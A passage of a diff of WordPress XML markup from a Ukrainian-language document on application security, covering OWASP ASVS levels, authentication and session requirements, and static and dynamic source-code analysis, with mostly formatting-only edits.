           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
@@ -7001,7 +6913,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
@@ -7022,7 +6933,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -7043,7 +6953,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -7064,7 +6973,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -7085,7 +6993,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -7106,7 +7013,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
@@ -7118,18 +7024,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Рівень 2 забезпечує контроль безпеки на місці, ефективний і </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">використовується в додатку. </w:t>
+        <w:t xml:space="preserve">Рівень 2 забезпечує контроль безпеки на місці, ефективний і використовується в додатку. </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -7214,7 +7109,59 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>ASVS Рівень 3 є високий рівень контролю в межах рівня ASVS.This, як правило, зарезервовані для додатків, що вимагають значних рівнів перевірки безпеки, таких, як ті, які можуть бути знайдені в районах військових, охорони здоров'я і безпеки, життєво важливої ​​інфраструктури і т.д. організацій може знадобитися ASVS 3-го рівня для додатків, що виконують критично важливі функції, де збій може істотно вплинути на діяльність організації, і навіть її живучість. Приклад вказівки по застосуванню ASVS Level 3 представлена ​​нижче. Додаток досягає ASVS 3-го рівня (або Advanced), якщо він адекватно захищає від передових вразливостей безпеки додатків, а також демонструє принципи хорошого дизайну безпеки.</w:t>
+        <w:t xml:space="preserve">ASVS Рівень 3 є високий рівень </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>контролю в межах рівня ASVS. Він, як правило, зарезервований</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> для додатків, що вимагають значних рівнів перевірки безпеки, таких, як ті</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>, які можуть бути знайдені в районах військових, охорони здоров'я і безпеки, життєво важливої ​​інфраструктури і т.д. організацій може знадобитися ASVS 3-го</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> рівня для додатків, що виконують критично важливі функції, де збій може істотно вплинути на діяльність організації, і навіть її живучість. Приклад вказівки по застосуванню ASVS Level 3 представлена ​​нижче. Додаток досягає ASVS 3-го </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>рівня (або Advanced), якщо він адекватно захищає від передових вразливостей безпеки додатків, а також демонструє принципи хорошого дизайну безпеки.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7368,7 +7315,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>(Наприклад, обробка навантаження коректно), аутентифікацію (в тому числі між системами), безвідмовності, авторизацію і аудит (ведення журналу).</w:t>
       </w:r>
       <w:r>
@@ -8258,7 +8204,18 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>додаток є ідентифікованими</w:t>
+              <w:t xml:space="preserve">додаток є </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>ідентифікованими</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -8421,6 +8378,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>1.3</w:t>
             </w:r>
           </w:p>
@@ -9326,7 +9284,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>1.7</w:t>
             </w:r>
           </w:p>
@@ -10401,6 +10358,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Аутентифікація є актом встановлення або підтвердження, що щось (або хтось</w:t>
       </w:r>
       <w:r>
@@ -11255,18 +11213,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> що </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>облікові дані зберігаютьс</w:t>
+              <w:t xml:space="preserve"> що облікові дані зберігаютьс</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11448,7 +11395,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>2.3</w:t>
             </w:r>
           </w:p>
@@ -12504,6 +12450,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>2.7</w:t>
             </w:r>
           </w:p>
@@ -13223,18 +13170,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> тому, що система може бути налаштована, щоб заборонити використання заданого </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>кількості попередніх паролів.</w:t>
+              <w:t xml:space="preserve"> тому, що система може бути налаштована, щоб заборонити використання заданого кількості попередніх паролів.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13386,7 +13322,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>2.11</w:t>
             </w:r>
           </w:p>
@@ -14237,6 +14172,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>2.15</w:t>
             </w:r>
           </w:p>
@@ -14887,7 +14823,6 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Переконайтеся в тому, що перевірений додаток задовольняє наступні вимоги управління сеансами високого рівня:</w:t>
       </w:r>
     </w:p>
@@ -16243,6 +16178,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>3.5</w:t>
             </w:r>
           </w:p>
@@ -17022,7 +16958,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t xml:space="preserve">цим </w:t>
             </w:r>
             <w:r>
@@ -17186,7 +17121,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>3.9</w:t>
             </w:r>
           </w:p>
@@ -18604,6 +18538,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>4.4</w:t>
             </w:r>
           </w:p>
@@ -19879,7 +19814,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>звичайних атак</w:t>
             </w:r>
             <w:r>
@@ -20102,7 +20036,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>4.9</w:t>
             </w:r>
           </w:p>
@@ -20918,6 +20851,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>4.12</w:t>
             </w:r>
           </w:p>
@@ -21648,54 +21582,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -21707,7 +21593,6 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>V</w:t>
       </w:r>
       <w:r>
@@ -22957,7 +22842,18 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> належним чином.</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>належним чином.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -23109,6 +23005,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>5.5</w:t>
             </w:r>
           </w:p>
@@ -23744,7 +23641,6 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Класифікація аналізаторів вихідного коду</w:t>
       </w:r>
     </w:p>
@@ -24150,7 +24046,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> коду знаходять проблеми і потенційно вразливі місця в початкових кодах і видають рекомендації для їх усунення. Варто зазначити, що більшість з аналізаторів </w:t>
+        <w:t xml:space="preserve"> коду знаходять проблеми і потенційно вразливі місця в початкових кодах і видають рекомендації для їх усунення. Варто </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">зазначити, що більшість з аналізаторів </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -24194,18 +24101,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
+        <w:t>ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -24324,7 +24220,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>ітом, що відбивається в базах вразливостей аналізаторів. Велика частина аналізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей (</w:t>
+        <w:t xml:space="preserve">ітом, що відбивається в базах вразливостей аналізаторів. Велика частина аналізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>(</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -24409,7 +24316,6 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5940425" cy="2083489"/>
@@ -24602,7 +24508,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">івняльних тестах. Державні бази помилок програмування - існує ряд державних баз вразливостей, складанням і </w:t>
+        <w:t xml:space="preserve">івняльних тестах. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Державні бази помилок програмування - існує ряд державних баз вразливостей, складанням і </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -24657,18 +24574,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Дані документи безпосередньо не описують помилки програмування, на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
+        <w:t>Дані документи безпосередньо не описують помилки програмування, на відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -25078,6 +24984,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -25327,7 +25234,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>П</w:t>
       </w:r>
       <w:r>
@@ -25512,7 +25418,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -25639,9 +25545,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> OWASP Top 10 </w:t>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25651,9 +25557,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>є</w:t>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>OWASP</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25663,7 +25569,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -25675,9 +25581,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>кращою</w:t>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Top</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25687,9 +25593,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 10 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25701,7 +25607,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>практикою</w:t>
+        <w:t>є</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25711,7 +25617,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -25725,7 +25631,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>усунення</w:t>
+        <w:t>кращою</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25735,7 +25641,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -25749,7 +25655,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>вразливостей</w:t>
+        <w:t>практикою</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25759,9 +25665,81 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>усунення</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>вразливостей</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Web-</w:t>
+        <w:t>Web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
